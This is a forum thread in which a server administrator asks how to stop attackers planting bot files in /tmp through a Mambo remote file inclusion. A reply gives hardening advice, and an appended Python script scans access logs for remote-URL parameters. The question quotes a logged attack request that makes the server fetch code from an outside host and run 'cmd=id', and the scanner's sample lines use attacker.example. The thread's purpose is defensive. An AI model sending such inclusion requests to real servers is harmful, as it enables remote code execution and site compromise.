From time to time I see this on some servers, but have not yet found a good way to prevent it. Is there anyone here who can help, maybe?
The problem is:
1. I find files like bot.txt, bnc.txt, cmdtemp and the like in the /tmp directory.
2. Investigating how they got there shows me, e.g.:
[01/Sep/2006:06:29:55 +0200] "GET /modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.exploits.pop.com.br/xpl.png?&cmd=id HTTP/1.0" 200 46 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
The scripts these two are calling are the attached files.
<removed, no point to making it easier>
I know I could just stop using Mambo, and stop using Coppermine, but I don't want to do that. Is there another solution to stop bad people uploading files to /tmp? (It is secured with noexec, but it still allows the bad guys to run their scripts.)
I'm running CentOS and DirectAdmin, if that means anything.
Update your CMS!
and -x /tmp
PHP safe mode ON
disable PHP functions: system,passthru,exec,popen,proc_close,proc_get_status,proc_nice,proc_open,proc_terminate,shell_exec,fpassthru
and also sockets if you do not need them.
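
Added example (not part of the original thread): a small Python scan of access-log lines, in the shape quoted in the question, for query parameters whose value is a remote URL, which is the pattern visible in the mosConfig_absolute_path request. The sample lines, the attacker.example host and the function name are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request part of a common/combined log line: "METHOD target HTTP/x.y" status
REQUEST_RE = re.compile(
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# A parameter value that is itself a remote URL (checked after percent-decoding)
REMOTE_RE = re.compile(r'^\s*(?:https?|ftps?)://', re.IGNORECASE)


def find_remote_includes(lines):
    """Return one finding per query parameter whose value is a remote URL."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue  # not a request line this parser understands
        parts = urlsplit(m["target"])
        # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if REMOTE_RE.match(value):
                findings.append({
                    "line": lineno,
                    "script": parts.path,
                    "param": name,
                    "status": int(m["status"]),
                })
    return findings


# Constructed sample lines (hosts are placeholders, not real indicators)
SAMPLE = [
    '[01/Sep/2006:06:29:55 +0200] "GET /modules/mod_mainmenu.php?mosConfig_absolute_path=http://attacker.example/xpl.png?&cmd=id HTTP/1.0" 200 46 "-" "Mozilla/4.0"',
    '[01/Sep/2006:06:30:02 +0200] "GET /index.php?option=com_content&id=5 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '[01/Sep/2006:06:31:10 +0200] "GET /gallery/index.php?path=HTTP%3A%2F%2Fattacker.example%2Fa.txt HTTP/1.0" 404 210 "-" "-"',
    '[01/Sep/2006:06:32:00 +0200] "GET /redirect.php?ref=/about.php HTTP/1.1" 200 300 "-" "-"',
]

if __name__ == "__main__":
    for finding in find_remote_includes(SAMPLE):
        print(finding)
```

A hit shows which script and parameter to review; a 200 status only means the request was served, and legitimate parameters that carry URLs (return or redirect targets) will also match.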